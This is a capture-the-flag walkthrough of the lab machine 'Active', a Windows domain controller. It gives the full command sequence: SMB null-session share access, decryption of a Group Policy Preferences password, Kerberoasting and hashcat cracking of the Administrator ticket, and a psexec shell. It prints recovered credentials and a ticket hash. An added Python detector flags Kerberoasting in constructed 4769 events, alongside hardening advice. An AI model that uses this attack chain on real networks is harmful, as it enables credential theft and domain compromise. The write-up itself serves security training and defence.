Active
Port Scanning
nmap -p53,88,135,139,445,464,593,636,3268,5722,9389,47001,49155,49152,49158,49168,49165,49169,49157,49154,49153 -sV -sC -T4 -Pn -oA active.htb active.htb
Scanning Result
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open tcpwrapped
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49168/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
SMB Enum
SMB is open on 139/445; together with DNS, Kerberos (88) and the LDAP Global Catalog (3268) this marks active.htb as a domain controller.
smbclient
smbclient -L //active.htb -U "%"
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
smbclient null-session login to the Replication share
smbclient //10.10.10.100/Replication -U ""%""
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
Groups.xml A 533 Thu Jul 19 04:46:06 2018
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
enum4linux
enum4linux active.htb
==================================( Share Enumeration on active.htb )==================================
do_connect: Connection to active.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on active.htb
//active.htb/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//active.htb/C$ Mapping: DENIED Listing: N/A Writing: N/A
//active.htb/IPC$ Mapping: OK Listing: DENIED Writing: N/A
[E] Can't understand response:
do_connect: Connection to DC.active.htb failed (Error NT_STATUS_UNSUCCESSFUL)
//active.htb/NETLOGON Mapping: N/A Listing: N/A Writing: N/A
//active.htb/Replication Mapping: OK Listing: OK Writing: N/A
[E] Can't understand response:
do_connect: Connection to DC.active.htb failed (Error NT_STATUS_UNSUCCESSFUL)
//active.htb/SYSVOL Mapping: N/A Listing: N/A Writing: N/A
//active.htb/Users Mapping: DENIED Listing: N/A Writing: N/A
smbmap
smbmap -H active.htb -R
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
.\Replication\*
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 active.htb
.\Replication\active.htb\*
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 DfsrPrivate
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 Policies
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 scripts
.\Replication\active.htb\DfsrPrivate\*
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 ConflictAndDeleted
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 Deleted
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 Installing
.\Replication\active.htb\Policies\*
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\*
Foothold
Groups.xml (a Group Policy Preferences file). Its cpassword attribute is AES-256-encrypted with a key Microsoft documented publicly, so anyone able to read SYSVOL or its Replication copy can recover the plaintext; MS14-025 stopped new passwords being written this way but left existing files in place.
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
  </User>
</Groups>
active.htb\SVC_TGS : edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
Decrypt the cpassword value (it is not a hash: it is AES-encrypted under a publicly known key, so recovery is deterministic and needs no cracking)
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ | tee cred
active.htb\SVC_TGS : GPPstillStandingStrong2k18
Check the recovered account's SMB access
smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
Priv Esc
Check for Kerberoasting (user accounts with an SPN set, whose service tickets are encrypted with a key derived from the account password)
GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out
Obtained hash (GetUserSPNs.out)
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$1ffa88531f4948eca74e8c85e3d7096f$ad3f1fb1ea3a5cb7e7c100b79ff57772260142c39dca461598d754b4c6cf2713e5dee298718093a5aa2ad6dbd1852a3c42afed10d3e6730fb84d76ff5b62f5be3eb1b0d1e9803473fc4e9e0645b8640e6d3d6bc6c852974d2c10770ad79f246a39fed1ae593824833f9d7ef26dcc90bafe5af1f4efc0a77bbbfdfeae5889eac85b1946059f8760f3ce6d902ae256cbb8012607465950c64dd7e4ccd0b5d3e16b84cf537ee5b377c278ced5e8873be6227aa7b32ca4a986db3c7d3ca7d2fa52cc7830f6dc504cef40a137eb93666c5bf4c6a9f4152651e8ef61c3686671a36bc554f79994da9442157b9be265afccc97bc07901c56b346db52ce90870b23a28e2a2e7e6565f1ef4db5b67eab13c684b4ba9c57179f203ef69a7b425533ab071e0230b2fb8d2389f44466d2307c735a8c903707f11884dd14dc51f065f875bf76e009f407e90d99759c4c9612741ce4fa630bead71fa1c87bf53a1815e28b18c0660437b2bbd8b2468ad6b11de0f40343a151daf5aebd07f10b4ec7a8f4f7afa3e8db898b6925d5833025c7cd3a715229c6ceec598e2b9b168a1977ac5c711bd57b9384de0b24140f68a4207650cce4da589c9db32e4455192da0964af242bc05aa3e51350cbc2c004b904909258c6b00f443c330244c8adf47ec6fdb495438346aadede69658c3cb0bb53c4b485d7f81f29670caee26e1cf763fc4b6ae18ff5af89acda09ab122aa846a4f24e5d23400a620a06caf3fc40f414fb32a99a4a7151b92e69ab772dc6233d0edfeafd9e772c642fbf25e486ae170182743a1cfe83c592bbbfe15dc86106becc8a3dee44db0372d9a547de82cebfa745df85123282fd221149a66dbb6847c8b5581722a97af36c4d8b31e954f72cc66745c8ab6d36485845a4a58826a47a1a776e8b88b37f446d6ab597e7fb8fcaac129846510d1b958c84ad493d602a5783e927142233e0d10c9ac4ead27331ca559415bb499efbbb91ba3cb2790028dcd8bc402cbe236b4459ea8757ca5429dcf7ce1d06614e8f4e4b071502cf9a860cade83165bc5c4f49f610be97861a25c2133a9b784288839022afa85e692042d8ff197498cfe466ee460df9e282ac8bb10823822dce7cac0e73cdb4ef7ffaf4432a06da4cb2b4d280c59be071a729090772ffa98957f1db3ef0033e7a7c2b0bb247688fe9a1cdcb8f829e96f4e773665987bfa9929d8b23663efa870cc5c8148e2245728813a2b973b34763383874de869776
Using hashcat to crack it
hashcat -m 13100 -a 0 GetUserSPNs.out /usr/share/wordlists/rockyou.txt --force
-m 13100 selects the Kerberos 5 TGS-REP etype 23 (RC4-HMAC) mode; the ticket is encrypted under a key derived from the service account's NTLM hash, so a wordlist attack on the account password recovers it.
Cracked
administrator : Ticketmaster1968
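On the domain controller, the GetUserSPNs.py -request step above leaves a trace: every service ticket it obtains is logged as Event ID 4769, and by default those tickets are requested with RC4-HMAC (Ticket Encryption Type 0x17) so they can be cracked offline. The following detection logic is an added example written for this write-up, not the author's code or any vendor's rule; it runs over constructed 4769 records in a flattened key=value form (not real Windows event text; a production rule would read the 4769 XML) and flags RC4 service tickets for user SPN accounts, escalating when the target is a privileged account or when one requester pulls tickets for several SPNs in a row.

```python
"""Flag Kerberoasting-style service-ticket requests in Event ID 4769 data.

Added example for this write-up, not the author's code or any vendor's
detection. Each service ticket GetUserSPNs.py -request obtains is logged
on the DC as Event ID 4769; RC4-HMAC (etype 0x17) tickets for user
accounts with SPNs are the ones an attacker cracks offline. The records
below are constructed in a flattened key=value form, not real Windows
event text.
"""
from collections import defaultdict

SAMPLE_4769_EVENTS = [
    # Constructed: one client pulls RC4 tickets for three user SPNs in a row,
    # one of them the built-in Administrator account (as on active.htb).
    "EventID=4769 Account=SVC_TGS@ACTIVE.HTB Service=Administrator TicketEncryptionType=0x17 Status=0x0 Client=10.10.14.5",
    "EventID=4769 Account=SVC_TGS@ACTIVE.HTB Service=sqlsvc TicketEncryptionType=0x17 Status=0x0 Client=10.10.14.5",
    "EventID=4769 Account=SVC_TGS@ACTIVE.HTB Service=websvc TicketEncryptionType=0x17 Status=0x0 Client=10.10.14.5",
    # Constructed normal traffic: a machine account's TGT and AES service tickets.
    "EventID=4769 Account=DC$@ACTIVE.HTB Service=krbtgt TicketEncryptionType=0x12 Status=0x0 Client=10.10.10.100",
    "EventID=4769 Account=jdoe@ACTIVE.HTB Service=DC$ TicketEncryptionType=0x12 Status=0x0 Client=10.10.10.50",
    "EventID=4769 Account=jdoe@ACTIVE.HTB Service=sqlsvc TicketEncryptionType=0x12 Status=0x0 Client=10.10.10.50",
    # Constructed failed request: no ticket was issued, so nothing to crack.
    "EventID=4769 Account=jdoe@ACTIVE.HTB Service=Administrator TicketEncryptionType=0x17 Status=0xc Client=10.10.10.50",
]

RC4_HMAC = "0x17"  # Ticket Encryption Type value for RC4-HMAC in 4769


def parse_event(line: str) -> dict:
    """Split one constructed 'key=value key=value' record into a dict."""
    return dict(kv.split("=", 1) for kv in line.split())


def detect_kerberoast(lines, privileged=("Administrator",), burst_threshold=3) -> list[dict]:
    """Return alerts for RC4 service tickets issued for user SPN accounts.

    privileged: service account names whose RC4 tickets are always high severity.
    burst_threshold: distinct RC4-ticketed services from one requester that
    trigger an additional high-severity burst alert.
    """
    alerts = []
    rc4_services = defaultdict(set)  # requesting account -> RC4-ticketed services
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
            continue  # only successfully issued service tickets can be cracked
        svc = ev["Service"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue  # computer accounts have long random passwords; krbtgt is the TGT
        if ev["TicketEncryptionType"].lower() != RC4_HMAC:
            continue  # AES tickets (0x11/0x12) are not the offline-cracking target
        severity = "high" if svc in privileged else "medium"
        alerts.append({"kind": "rc4_tgs", "account": ev["Account"], "service": svc,
                       "client": ev["Client"], "severity": severity,
                       "reason": f"RC4 service ticket issued for user SPN account {svc}"})
        rc4_services[ev["Account"]].add(svc)
    for account, services in rc4_services.items():
        if len(services) >= burst_threshold:
            alerts.append({"kind": "burst", "account": account, "service": None,
                           "client": None, "severity": "high",
                           "reason": f"{len(services)} distinct RC4 service tickets: {sorted(services)}"})
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoast(SAMPLE_4769_EVENTS):
        print(f"[{alert['severity']}] {alert['kind']} {alert['account']}: {alert['reason']}")
```

Baseline this against your own environment first, since legacy applications can legitimately request RC4 tickets; the structural fixes are to remove SPNs from privileged accounts such as Administrator, give service accounts long random passwords or use group managed service accounts, and restrict the accounts to AES via msDS-SupportedEncryptionTypes so RC4 tickets stop being issued at all.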
Get a shell using psexec
psexec.py active.htb/administrator@10.10.10.100